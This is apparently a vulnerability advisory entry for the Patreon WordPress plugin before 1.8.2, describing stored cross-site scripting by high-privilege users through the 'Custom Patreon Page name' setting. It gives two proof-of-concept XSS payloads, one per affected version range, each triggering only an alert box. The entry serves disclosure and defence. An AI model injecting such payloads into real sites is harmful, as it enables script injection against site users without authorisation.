Lucene search

K
wpexploitJosé AguileraWPEX-ID:02756DD3-832A-4846-B9E1-A34F148B5CFE
HistoryFeb 21, 2022 - 12:00 a.m.

Patreon WordPress < 1.8.2 - Admin+ Stored Cross-Site Scripting

2022-02-2100:00:00
José Aguilera
82
patreon wordpress
cross-site scripting
admin+ stored
vulnerability
security exploit

EPSS

0.001

Percentile

21.4%

The plugin does not sanitise and escape the field “Custom Patreon Page name”, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed

Put the following payload in the "Custom Patreon Page name" setting of the plugin and save them:

v < 1.8.0: "><script>alert(/XSS/)</script>
v < 1.8.2: " style=animation-name:rotation onanimationstart=alert(/XSS/)//

EPSS

0.001

Percentile

21.4%

Related for WPEX-ID:02756DD3-832A-4846-B9E1-A34F148B5CFE